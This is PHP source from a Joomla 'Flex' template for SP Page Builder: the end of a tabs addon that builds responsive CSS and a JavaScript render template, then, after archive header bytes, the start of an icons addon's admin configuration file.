            $css .= $font_style;
            $css .= 'box-shadow:'.$box_shadow.';';
            $css .= '}';
            $css .= $addon_id . ' .sppb-nav-custom li {';
                $css .= $nav_margin;
            $css .= '}';
            $css .= $addon_id . ' .sppb-tab-icon {';
            $css .= $icon_style;
            $css .= '}';
            $css .= $addon_id . ' .sppb-tab-image {';
            $css .= $image_style;
            $css .= '}';
            //Nav Hover Style
            $hover_style = '';
            $hover_style .= (isset($settings->hover_tab_color) && $settings->hover_tab_color) ? 'color: ' . $settings->hover_tab_color . ';': '';
            $hover_style .= (isset($settings->hover_tab_border_width) && trim($settings->hover_tab_border_width)) ? 'border-width: ' . $settings->hover_tab_border_width . ';border-style: solid;': '';
            $hover_style .= (isset($settings->hover_tab_border_color) && $settings->hover_tab_border_color) ? 'border-color: ' . $settings->hover_tab_border_color . ';': '';
            $hover_style .= (isset($settings->hover_tab_bg) && $settings->hover_tab_bg) ? 'background-color: ' . $settings->hover_tab_bg . ';': '';
            
            if($hover_style) {
                $css .= $addon_id . ' .sppb-nav-custom > li > a:hover,' . $addon_id . ' .sppb-nav-custom > li > a:focus {';
                $css .= $hover_style;
                $css .= '}';
            }

            //Icon hover and active color
            $icon_color_hover = (isset($settings->icon_color_hover) && $settings->icon_color_hover) ? 'color: ' . $settings->icon_color_hover . ';': '';
            if($icon_color_hover) {
                $css .= $addon_id . ' .sppb-nav-custom > li > a:hover  > .sppb-tab-icon,' . $addon_id . ' .sppb-nav-custom > li > a:focus > .sppb-tab-icon {';
                $css .= $icon_color_hover;
                $css .= '}';
            }
            $icon_color_active = (isset($settings->icon_color_active) && $settings->icon_color_active) ? 'color: ' . $settings->icon_color_active . ';': '';
            if($icon_color_active) {
                $css .= $addon_id . ' .sppb-nav-custom > li.active > a > .sppb-tab-icon,' . $addon_id . ' .sppb-nav-custom > li.active > a:hover  > .sppb-tab-icon,' . $addon_id . ' .sppb-nav-custom > li.active > a:focus > .sppb-tab-icon {';
                $css .= $icon_color_active;
                $css .= '}';
            }
        }
        if (!empty($font_style_sm) || !empty($nav_width_sm) || !empty($content_style_sm) || !empty($nav_margin_sm) || !empty($image_style_sm)) {
            $css .= '@media (min-width: 768px) and (max-width: 991px) {';
            
            $css .= $addon_id . ' .sppb-nav-custom {';
            if(!empty($nav_width_sm)){
                $css .= 'width: ' . $nav_width_sm . '%;';
            }
            $css .= $nav_gutter_right_sm;
            $css .= '}';
            $css .= $addon_id . ' .sppb-tab-custom-content {';
            if(!empty($nav_width_sm) && $nav_width_sm != 100){
                $css .= 'width:'. (100 - $nav_width_sm) .'%;';
            } else {
                $css .= 'width: 100%;';    
            }
            $css .= $nav_gutter_left_sm;
            $css .= '}';
            $css .= $addon_id . ' .sppb-tab-custom-content > div {';
            $css .= $content_style_sm;
            $css .= '}';
            $css .= $addon_id . ' .sppb-nav-custom a {';
            $css .= $font_style_sm;
            $css .= '}';
            $css .= $addon_id . ' .sppb-nav-custom li {';
            $css .= $nav_margin_sm;
            $css .= '}';
            $css .= $addon_id . ' .sppb-tab-icon {';
            $css .= $icon_style_sm;
            $css .= '}';
            $css .= $addon_id . ' .sppb-tab-image {';
            $css .= $image_style_sm;
            $css .= '}';
            
            $css .= '}';
        }
        if (!empty($font_style_xs) || !empty($nav_width_xs) || !empty($content_style_xs) || !empty($nav_margin_xs) || !empty($image_style_xs)) {
            $css .= '@media (max-width: 767px) {';
            
            $css .= $addon_id . ' .sppb-nav-custom {';
            if(!empty($nav_width_xs)){
            $css .= 'width: ' . $nav_width_xs . '%;';
            }
            $css .= $nav_gutter_right_xs;
            $css .= '}';
            $css .= $addon_id . ' .sppb-tab-custom-content {';
            if(!empty($nav_width_xs) && $nav_width_xs != 100){
                $css .= 'width:'. (100 - $nav_width_xs) .'%;';
            } else {
                $css .= 'width: 100%;';    
            }
            $css .= $nav_gutter_left_xs;
            $css .= '}';
            $css .= $addon_id . ' .sppb-tab-custom-content > div {';
            $css .= $content_style_xs;
            $css .= '}';
            $css .= $addon_id . ' .sppb-nav-custom a {';
            $css .= $font_style_xs;
            $css .= '}';
            $css .= $addon_id . ' .sppb-nav-custom li {';
            $css .= $nav_margin_xs;
            $css .= '}';
            $css .= $addon_id . ' .sppb-tab-icon {';
            $css .= $icon_style_xs;
            $css .= '}';
            $css .= $addon_id . ' .sppb-tab-image {';
            $css .= $image_style_xs;
            $css .= '}';
            
            $css .= '}';
        }

		return $css;
	}

	public static function getTemplate(){
		$output = '
		<style type="text/css">
            <# 
                var navPosition = data.nav_position || "nav-left";
                var box_shadow = "";
                if(data.show_boxshadow){
                    box_shadow += (!_.isEmpty(data.shadow_horizontal) && data.shadow_horizontal) ?  data.shadow_horizontal + \'px \' : "0 ";
                    box_shadow += (!_.isEmpty(data.shadow_vertical) && data.shadow_vertical) ?  data.shadow_vertical + \'px \' : "0 ";
                    box_shadow += (!_.isEmpty(data.shadow_blur) && data.shadow_blur) ?  data.shadow_blur + \'px \' : "0 ";
                    box_shadow += (!_.isEmpty(data.shadow_spread) && data.shadow_spread) ?  data.shadow_spread + \'px \' : "0 ";
                    box_shadow += (!_.isEmpty(data.shadow_color) && data.shadow_color) ?  data.shadow_color : "rgba(0, 0, 0, .5)";
                }
                if(data.style == "pills"){
            #>
                    #sppb-addon-{{ data.id }} .sppb-nav-pills > li.active > a,
                    #sppb-addon-{{ data.id }} .sppb-nav-pills > li.active > a:hover,
                    #sppb-addon-{{ data.id }} .sppb-nav-pills > li.active > a:focus{
                        color: {{ data.active_tab_color }};
                        background-color: {{ data.active_tab_bg }};
                    }
			<# } #>

			<# if(data.style == "lines"){ #>
                #sppb-addon-{{ data.id }} .sppb-nav-lines > li.active > a,
                #sppb-addon-{{ data.id }} .sppb-nav-lines > li.active > a:hover,
                #sppb-addon-{{ data.id }} .sppb-nav-lines > li.active > a:focus{
                    color: {{ data.active_tab_color }};
                    border-bottom-color: {{ data.active_tab_bg }};
                }
			<# } #>
            <# if (data.style == "custom") { #>
                #sppb-addon-{{ data.id }} .sppb-nav-custom > li > a:hover,
                #sppb-addon-{{ data.id }} .sppb-nav-custom > li > a:focus{
                    color: {{ data.hover_tab_color }};
                    border-width: {{ data.hover_tab_border_width }};
                    border-color: {{ data.hover_tab_border_color }};
                    background-color: {{ data.hover_tab_bg }};
                }
                #sppb-addon-{{ data.id }} .sppb-nav-custom > li.active > a,
                #sppb-addon-{{ data.id }} .sppb-nav-custom > li.active > a:hover,
                #sppb-addon-{{ data.id }} .sppb-nav-custom > li.active > a:focus{
                    color: {{ data.active_tab_color }};
                    border-width: {{ data.active_tab_border_width }};
                    border-color: {{ data.active_tab_border_color }};
                    background-color: {{ data.active_tab_bg }};
                }
                #sppb-addon-{{ data.id }} .sppb-nav-custom > li > a:hover > .sppb-tab-icon,
                #sppb-addon-{{ data.id }} .sppb-nav-custom > li > a:focus > .sppb-tab-icon{
                    color: {{ data.icon_color_hover }};
                }
                #sppb-addon-{{ data.id }} .sppb-nav-custom > li.active > a > .sppb-tab-icon,
                #sppb-addon-{{ data.id }} .sppb-nav-custom > li.active > a:hover > .sppb-tab-icon,
                #sppb-addon-{{ data.id }} .sppb-nav-custom > li.active > a:focus > .sppb-tab-icon{
                    color: {{ data.icon_color_active }};
                }
                #sppb-addon-{{ data.id }} .sppb-nav-custom li {
                    <# if(_.isObject(data.nav_margin)){ #>
                        padding: {{data.nav_margin.md}};
                    <# } else { #>
                        padding: {{data.nav_margin}};
                    <# } #>
                }
                #sppb-addon-{{ data.id }} .sppb-nav-custom li a {
                    <# if(_.isObject(data.nav_fontsize)){ #>
                        font-size: {{data.nav_fontsize.md}}px;
                    <# } else { #>
                        font-size: {{data.nav_fontsize}}px;
                    <# } #>
                    <# if(_.endsWith(data.nav_border, "x")) { #>
                        border-width: {{data.nav_border}};
                        border-style: solid;
                    <# } else { #>
                        border: {{_.trim(data.nav_border, " ")}}px solid;
                    <# } #>
                    border-color: {{data.nav_border_color}};
                    color: {{data.nav_color}};
                    background-color: {{data.nav_bg_color}};
                    border-radius: {{data.nav_border_radius}}px;
                    <# if(_.isObject(data.nav_padding)){ #>
                        padding: {{data.nav_padding.md}};
                    <# } else { #>
                        padding: {{data.nav_padding}};
                    <# } #>
                    box-shadow: {{box_shadow}};
                    font-family:{{data.nav_font_family}};
                    <# if(_.isObject(data.nav_lineheight)){ #>
                        line-height:{{data.nav_lineheight.md}}px;
                    <# }
                    if(_.isObject(data.nav_font_style)){
                        if(data.nav_font_style.underline){
                    #>
                            text-decoration:underline;
                        <# }
                        if(data.nav_font_style.italic){
                        #>
                            font-style:italic;
                        <# }
                        if(data.nav_font_style.uppercase){
                        #>
                            text-transform:uppercase;
                        <# }
                        if(data.nav_font_style.weight){
                        #>
                            font-weight:{{data.nav_font_style.weight}};
                        <# }
                    } #>
                }
                #sppb-addon-{{ data.id }} .sppb-tab-icon {
                    <# if(data.icon_color){ #>
                        color:{{data.icon_color}};
                    <# } #>
                    <# if(_.isObject(data.icon_fontsize)){ #>
                        font-size: {{data.icon_fontsize.md}}px;
                    <# } else { #>
                        font-size: {{data.icon_fontsize}}px;
                    <# } #>
                    <# if(_.isObject(data.icon_margin)){ #>
                        margin: {{data.icon_margin.md}};
                    <# } else { #>
                        margin: {{data.icon_margin}};
                    <# } #>
                }
                #sppb-addon-{{ data.id }} .sppb-tab-image {
                    <# if(_.isObject(data.image_height)){ #>
                        height: {{data.image_height.md}}px;
                    <# } else { #>
                        height: {{data.image_height}}px;
                    <# }
                    if(_.isObject(data.image_width)){
                    #>
                        width: {{data.image_width.md}}px;
                    <# } else { #>
                        width: {{data.image_width}}px;
                    <# }
                    if(_.isObject(data.image_margin)){
                    #>
                        margin: {{data.image_margin.md}};
                    <# } else { #>
                        margin: {{data.image_margin}};
                    <# } #>
                }
                #sppb-addon-{{ data.id }} .sppb-nav-custom {
                    <# if(_.isObject(data.nav_width)){ #>
                        width: {{data.nav_width.md}}%;
                    <# } else { #>
                        width: {{data.nav_width}}%;
                    <# }
                    if(navPosition == "nav-right") {
                    #>
                        <# if(_.isObject(data.nav_gutter)){ #>
                            padding-left: {{data.nav_gutter.md}}px;
                        <# } else { #>
                            padding-left: {{data.nav_gutter}}px;
                        <# } #>
                    <# } else { 
                        if(_.isObject(data.nav_gutter)){
                    #>
                            padding-right: {{data.nav_gutter.md}}px;
                        <# } else { #>
                            padding-right: {{data.nav_gutter}}px;
                        <# }
                    } #>
                }
                #sppb-addon-{{ data.id }} .sppb-tab-custom-content {
                    <# if(_.isObject(data.nav_width)){ #>
                        width: {{100-data.nav_width.md}}%;
                    <# } else { #>
                        width: {{100-data.nav_width}}%; 
                    <# } #>
                    <# if(navPosition == "nav-right"){ #>
                        <# if(_.isObject(data.nav_gutter)){ #>
                            padding-right: {{data.nav_gutter.md}}px;
                        <# } else { #>
                            padding-right: {{data.nav_gutter}}px;
                        <# } #>
                    <# } else { #>
                        <# if(_.isObject(data.nav_gutter)){ #>
                            padding-left: {{data.nav_gutter.md}}px;
                        <# } else { #>
                            padding-left: {{data.nav_gutter}}px;
                        <# } #>
                    <# } #>
                }
                #sppb-addon-{{ data.id }} .sppb-tab-custom-content > div {
                    background-color: {{data.content_backround}};
                    border: {{data.content_border}}px solid;
                    border-color: {{data.content_border_color}};
                    border-radius: {{data.content_border_radius}}px;
                    color: {{data.content_color}};
                    <# if(_.isObject(data.content_padding)){ #>
                        padding: {{data.content_padding.md}};
                    <# } else { #>
                        padding: {{data.content_padding}};
                    <# } #>
                    <# if(_.isObject(data.content_margin)){ #>
                        margin: {{data.content_margin.md}};
                    <# } else { #>
                        margin: {{data.content_margin}};
                    <# } #>
                    box-shadow: {{box_shadow}};
                    font-family:{{data.content_font_family}};
                    <# if(_.isObject(data.content_fontsize)){ #>
                        font-size:{{data.content_fontsize.md}}px;
                    <# }
                    if(_.isObject(data.content_lineheight)){ #>
                        line-height:{{data.content_lineheight.md}}px;
                    <# }
                    if(_.isObject(data.content_font_style)){
                        if(data.content_font_style.underline){
                    #>
                            text-decoration:underline;
                        <# }
                        if(data.content_font_style.italic){
                        #>
                            font-style:italic;
                        <# }
                        if(data.content_font_style.uppercase){
                        #>
                            text-transform:uppercase;
                        <# }
                        if(data.content_font_style.weight){
                        #>
                            font-weight:{{data.content_font_style.weight}};
                        <# }
                    } #>
                }
                @media (min-width: 768px) and (max-width: 991px) {
                    #sppb-addon-{{ data.id }} .sppb-nav-custom li {
                        <# if(_.isObject(data.nav_margin)){ #>
                            padding: {{data.nav_margin.sm}};
                        <# } #>
                    }
                    #sppb-addon-{{ data.id }} .sppb-nav-custom li a {
                        <# if(_.isObject(data.nav_fontsize)){ #>
                            font-size: {{data.nav_fontsize.sm}}px;
                        <# } #>
                        <# if(_.isObject(data.nav_padding)){ #>
                            padding: {{data.nav_padding.sm}};
                        <# } #>
                        <# if(_.isObject(data.nav_lineheight)){ #>
                            line-height:{{data.nav_lineheight.sm}}px;
                        <# } #>
                    }
                    #sppb-addon-{{ data.id }} .sppb-tab-icon {
                        <# if(_.isObject(data.icon_fontsize)){ #>
                            font-size: {{data.icon_fontsize.sm}}px;
                        <# } #>
                        <# if(_.isObject(data.icon_margin)){ #>
                            margin: {{data.icon_margin.sm}};
                        <# } #>
                    }
                    <# if(_.isObject(data.nav_width)){ #>
                        #sppb-addon-{{ data.id }} .sppb-nav-custom {
                            width: {{data.nav_width.sm}}%;
                            <# if(_.isObject(data.nav_gutter)){ #>
                                <# if(navPosition == "nav-right") { #>
                                    padding-left: {{data.nav_gutter.sm}}px;
                                <# } else { #>
                                    padding-right: {{data.nav_gutter.sm}}px;
                                <# } #>
                            <# } #>
                        }
                        #sppb-addon-{{ data.id }} .sppb-tab-custom-content {
                            <# if(data.nav_width.sm !== "100"){ #>
                                width: {{100-data.nav_width.sm}}%;
                            <# } else { #>
                                width: 100%;
                            <# } #>
                            <# if(_.isObject(data.nav_gutter)){ #>
                                <# if(navPosition == "nav-right") { #>
                                    padding-right: {{data.nav_gutter.sm}}px;
                                <# } else { #>
                                    padding-left: {{data.nav_gutter.sm}}px;
                                <# } #>
                            <# } #>
                        }
                    <# } #>
                    #sppb-addon-{{ data.id }} .sppb-tab-custom-content > div {
                        <# if(_.isObject(data.content_padding)){ #>
                            padding: {{data.content_padding.sm}};
                        <# } #>
                        <# if(_.isObject(data.content_margin)){ #>
                            margin: {{data.content_margin.sm}};
                        <# }
                        if(_.isObject(data.content_fontsize)){ #>
                            font-size:{{data.content_fontsize.sm}}px;
                        <# }
                        if(_.isObject(data.content_lineheight)){ #>
                            line-height:{{data.content_lineheight.sm}}px;
                        <# } #>
                    }
                    #sppb-addon-{{ data.id }} .sppb-tab-image {
                        <# if(_.isObject(data.image_height)){ #>
                            height: {{data.image_height.sm}}px;
                        <# }
                        if(_.isObject(data.image_width)){
                        #>
                            width: {{data.image_width.sm}}px;
                        <# }
                        if(_.isObject(data.image_margin)){
                        #>
                            margin: {{data.image_margin.sm}};
                        <# } #>
                    }
                }
                @media (max-width: 767px) {
                    #sppb-addon-{{ data.id }} .sppb-nav-custom li {
                        <# if(_.isObject(data.nav_margin)){ #>
                            padding: {{data.nav_margin.xs}};
                        <# } #>
                    }
                    #sppb-addon-{{ data.id }} .sppb-nav-custom li a {
                        <# if(_.isObject(data.nav_fontsize)){ #>
                            font-size: {{data.nav_fontsize.xs}}px;
                        <# } #>
                        <# if(_.isObject(data.nav_padding)){ #>
                            padding: {{data.nav_padding.xs}};
                        <# } #>
                        <# if(_.isObject(data.nav_lineheight)){ #>
                            line-height:{{data.nav_lineheight.xs}}px;
                        <# } #>
                    }
                    #sppb-addon-{{ data.id }} .sppb-tab-icon {
                        <# if(_.isObject(data.icon_fontsize)){ #>
                            font-size: {{data.icon_fontsize.xs}}px;
                        <# } #>
                        <# if(_.isObject(data.icon_margin)){ #>
                            margin: {{data.icon_margin.xs}};
                        <# } #>
                    }
                    <# if(_.isObject(data.nav_width)){ #>
                        #sppb-addon-{{ data.id }} .sppb-nav-custom {
                            width: {{data.nav_width.xs}}%;
                            <# if(_.isObject(data.nav_gutter)){ #>
                                <# if(navPosition == "nav-right") { #>
                                    padding-left: {{data.nav_gutter.xs}}px;
                                <# } else { #>
                                    padding-right: {{data.nav_gutter.xs}}px;
                                <# } #>
                            <# } #>
                        }
                        #sppb-addon-{{ data.id }} .sppb-tab-custom-content {
                            <# if(data.nav_width.xs !== "100"){ #>
                                width: {{100-data.nav_width.xs}}%;
                            <# } else { #>
                                width: 100%;
                            <# } #>
                            <# if(_.isObject(data.nav_gutter)){ #>
                                <# if(navPosition == "nav-right") { #>
                                    padding-right: {{data.nav_gutter.xs}}px;
                                <# } else { #>
                                    padding-left: {{data.nav_gutter.xs}}px;
                                <# } #>
                            <# } #>
                        }
                    <# } #>
                    #sppb-addon-{{ data.id }} .sppb-tab-custom-content > div {
                        <# if(_.isObject(data.content_padding)){ #>
                            padding: {{data.content_padding.xs}};
                        <# } #>
                        <# if(_.isObject(data.content_margin)){ #>
                            margin: {{data.content_margin.xs}};
                        <# }
                        if(_.isObject(data.content_fontsize)){ #>
                            font-size:{{data.content_fontsize.xs}}px;
                        <# }
                        if(_.isObject(data.content_lineheight)){ #>
                            line-height:{{data.content_lineheight.xs}}px;
                        <# } #>
                    }
                    #sppb-addon-{{ data.id }} .sppb-tab-image {
                        <# if(_.isObject(data.image_height)){ #>
                            height: {{data.image_height.xs}}px;
                        <# }
                        if(_.isObject(data.image_width)){
                        #>
                            width: {{data.image_width.xs}}px;
                        <# }
                        if(_.isObject(data.image_margin)){
                        #>
                            margin: {{data.image_margin.xs}};
                        <# } #>
                    }
                }
            <# } #>
		</style>
		<div class="sppb-addon sppb-addon-tab {{ data.class }}">
            <# if( !_.isEmpty( data.title )){ #>
                <{{ data.heading_selector }} class="sppb-addon-title">{{{ data.title }}}</{{ data.heading_selector }}>
            <# } 
            let icon_postion = (data.nav_icon_postion == \'top\' || data.nav_icon_postion == \'bottom\') ? \'tab-icon-block\' : \'\';
            #>
            <div class="sppb-addon-content sppb-tab sppb-{{data.style}}-tab sppb-tab-{{navPosition}}">
                <ul class="sppb-nav sppb-nav-{{ data.style }}">
                    <#
                        _.each(data.sp_tab_item, function(tab, key){
                            var active = "";
                            if(key == 0){
                                active = "active";
                            }

                            var title = "";
                            var subtitle = "";
                            var icon_top ="";
                            var icon_bottom = "";
                            var icon_right = "";
                            var icon_left = "";
                            var icon_block = "";
                            
                            let icon_arr = (typeof tab.icon !== "undefined" && tab.icon) ? tab.icon.split(" ") : "";
							let peicon_name_arr = (typeof tab.peicon_name !== "undefined" && tab.peicon_name) ? tab.peicon_name.split(" ") : "";
				            let icon_name = icon_arr.length === 1 ? "fa "+tab.icon : tab.icon;
							let peicon = peicon_name_arr.length === 1 ? "pe "+tab.peicon_name : tab.peicon_name;

                            var image_top ="";
                            var image_bottom = "";
                            var image_right = "";
                            var image_left = "";
                            
                            if(!_.isEmpty(tab.image_or_icon) && tab.image_or_icon == "image"){
                                if(!_.isEmpty(tab.image) && tab.image && data.nav_image_postion == "top"){
                                    image_top = \'<img class="sppb-tab-image tab-image-block" src="\' + tab.image + \'"/>\';
                                } else if (!_.isEmpty(tab.icon) && tab.icon && data.nav_image_postion == "bottom") {
                                    image_bottom = \'<img class="sppb-tab-image tab-image-block" src="\' + tab.image + \'"/>\';
                                } else if (!_.isEmpty(tab.icon) && tab.icon && data.nav_image_postion == "right") {
                                    image_right = \'<img class="sppb-tab-image" src="\' + tab.image + \'"/>\';
                                } else {
                                    image_left = \'<img class="sppb-tab-image" src="\' + tab.image + \'"/>\';
                                }
                            } else { 
							
								if(tab.icon){
								
									if(!_.isEmpty(tab.icon) && tab.icon && data.nav_icon_postion == "top"){
										icon_top = \'<span class="sppb-tab-icon tab-icon-block"><i class="\' + icon_name + \'"></i></span>\';
									} else if (!_.isEmpty(tab.icon) && tab.icon && data.nav_icon_postion == "bottom") {
										icon_bottom = \'<span class="sppb-tab-icon tab-icon-block"><i class="\' + icon_name + \'"></i></span>\';
									} else if (!_.isEmpty(tab.icon) && tab.icon && data.nav_icon_postion == "right") {
										icon_right = \'<span class="sppb-tab-icon"><i class="\' + icon_name + \'"></i></span>\';
									} else {
										icon_left = \'<span class="sppb-tab-icon"><i class="\' + icon_name + \'"></i></span>\';
									}
								} else {
									
									if(!_.isEmpty(tab.peicon_name) && tab.peicon_name && data.nav_icon_postion == "top"){
										icon_top = \'<span class="sppb-tab-icon tab-icon-block"><i class="\' + peicon + \'"></i></span>\';
									} else if (!_.isEmpty(tab.peicon_name) && tab.peicon_name && data.nav_icon_postion == "bottom") {
										icon_bottom = \'<span class="sppb-tab-icon tab-icon-block"><i class="\' + peicon + \'"></i></span>\';
									} else if (!_.isEmpty(tab.peicon_name) && tab.icon && data.nav_icon_postion == "right") {
										icon_right = \'<span class="sppb-tab-icon"><i class="\' + peicon + \'"></i></span>\';
									} else {
										icon_left = \'<span class="sppb-tab-icon"><i class="\' + peicon + \'"></i></span>\';
									}
									
								}
								
                            }
                            
                            if(tab.title){
                                title = tab.title;
                            }
                            if(tab.subtitle){
                                subtitle = `<span class="sppb-tab-subtitle">${tab.subtitle}</span>`;
                            }
                            if(data.nav_icon_postion == "top" || data.nav_icon_postion == "bottom" || data.nav_image_postion == "top" || data.nav_image_postion == "bottom"){
                                icon_block = "tab-img-or-icon-block-wrap";
                            }
                    #>
                        <li class="{{ active }}">
                        <a data-toggle="sppb-tab" class="{{data.style === "custom" ? data.nav_text_align : ""}} {{icon_block}}" href="#sppb-tab-{{ data.id }}{{ key }}">{{{icon_top}}} {{{icon_left}}} {{{image_top}}} {{{image_left}}} {{title}} {{{icon_right}}} {{{icon_bottom}}} {{{image_right}}} {{{image_bottom}}} {{{subtitle}}}</a>
                        </li>
                    <# }); #>
                </ul>
                <div class="sppb-tab-content sppb-tab-{{ data.style }}-content">
                    <# _.each(data.sp_tab_item, function(tab, key){ #>
                        <#
                            var active = "";
                            if(key == 0){
                                active = "active in";
                            }
                        #>
                        <div id="sppb-tab-{{ data.id }}{{ key }}" class="sppb-tab-pane sppb-fade {{ active }}">
                            <#
                            var htmlContent = "";
                            _.each(tab.content, function(content){
                                htmlContent += content;
                            });
                            #>
                            {{{ htmlContent }}}
                        </div>
                    <# }); #>
                </div>
            </div>
		</div>
		';

		return $output;
	}

}PK!��\��)flex/sppagebuilder/addons/icons/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

//Include Pixeden Icons
require_once dirname(dirname( __DIR__ )) . '/fields/pixeden-icons.php';
SpAddonsConfig::addonConfig(
	array(
		'type'=>'repeatable',
		'addon_name'=>'sp_icons',
		'title'=>JText::_('FLEX_ADDON_ICONS'),
		'desc'=>JText::_('FLEX_ADDON_ICONS_DESC'),
		'category'=>'Flex',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

			'title'=>array(
				'type'=>'text', 
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_DESC'),
				'std'=>  ''
				),

			'heading_selector'=>array(
				'type'=>'select', 
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
				'values'=>array(
					'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
					'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
					'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
					'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
					'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
					'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
					),
				'std'=>'h3',
				'depends'=>array(array('title', '!=', '')),
			),

			'title_fontsize'=>array(
				'type'=>'number', 
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
				'std'=>'',
				'depends'=>array(array('title', '!=', '')),
				),

			'title_fontweight'=>array(
				'type'=>'text', 
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_WEIGHT'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_WEIGHT_DESC'),
				'std'=>'',
				'depends'=>array(array('title', '!=', '')),
				),

			'title_text_color'=>array(
				'type'=>'color',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
				'depends'=>array(array('title', '!=', '')),
				),	

			'title_margin_top'=>array(
				'type'=>'number',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
				'placeholder'=>'10',
				'depends'=>array(array('title', '!=', '')),
				),

			'title_margin_bottom'=>array(
				'type'=>'number',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
				'placeholder'=>'10',
				'depends'=>array(array('title', '!=', '')),
				),	
				
			'margin_gap'=>array(
				'type'=>'number', 
				'title'=>JText::_('FLEX_ADDON_ICONS_GAP'),
				'desc'=>JText::_('FLEX_ADDON_ICONS_GAP_DESC'),
				'placeholder'=>'10',
				'std'=>'10',
				),
			'alignment'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT_DESC'),
				'values'=>array(
					'sppb-text-left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
					'sppb-text-center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
					'sppb-text-right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
				'std'=>'sppb-text-left',
				),
			'class'=>array(
				'type'=>'text', 
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
				'std'=> ''
				),
			'title_tooltip'=>array(
				'type'=>'checkbox', 
				'title'=>JText::_('FLEX_ADDON_TITLE_TOOLTIP'),
				'desc'=>JText::_('FLEX_ADDON_TITLE_TOOLTIP_DESC'),
				'values'=> array(
					1=>JText::_('JYES'),
					0=>JText::_('JNO'),
				),
				'std'=>1,
			    ),							
			// Repeatable Items
			'sp_icons_item'=>array(
				'title'=> 'Icons', 
				'attr'=>array(
				
					'title'=>array(
						'type'=>'text', 
						'title'=>JText::_('FLEX_ADDON_ICONS_TITLE'),
						'desc'=>JText::_('FLEX_ADDON_ICONS_TITLE_DESC'),
						'std'=>JText::_('FLEX_ADDON_ICONS_TITLE_STD')
						),

					'peicon_name'=>array( // Pixeden Icons
							'type'=>'select', 
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME_DESC'),
							'values'=> $peicon_list
						),		
		
					'icon_name'=>array(
						'type'=>'icon', 
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONTAWESOME_ICON_NAME'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONTAWESOME_ICON_NAME_DESC'),
						'std'=> ''
						),
					'size'=>array(
						'type'=>'number',
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_ICON_SIZE'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_ICON_SIZE_DESC'),
						'placeholder'=>24,
						'std'=>24,
						),
					'font_weight'=>array(
						'type'=>'text',
						'title'=>JText::_('FLEX_ADDON_GLOBAL_ICON_FONT_WEIGHT'),
						'desc'=>JText::_('FLEX_ADDON_GLOBAL_ICON_FONT_WEIGHT_DESC'),
						'placeholder'=>'300',
						'std'=>'',
						),
					'color'=>array(
						'type'=>'color',
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_COLOR'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_COLOR_DESC'),
						),
		
					'background'=>array(
						'type'=>'color',
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_BACKGROUND'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_BACKGROUND_DESC'),
						),
		
					'border_color'=>array(
						'type'=>'color',
						'title'=>JText::_('FLEX_GLOBAL_BORDER_COLOR'),
						'desc'=>JText::_('FLEX_GLOBAL_BORDER_COLOR_DESC'),
						),
		
					'border_width'=>array(
						'type'=>'number',
						'title'=>JText::_('FLEX_GLOBAL_BORDER_WIDTH_SIZE'),
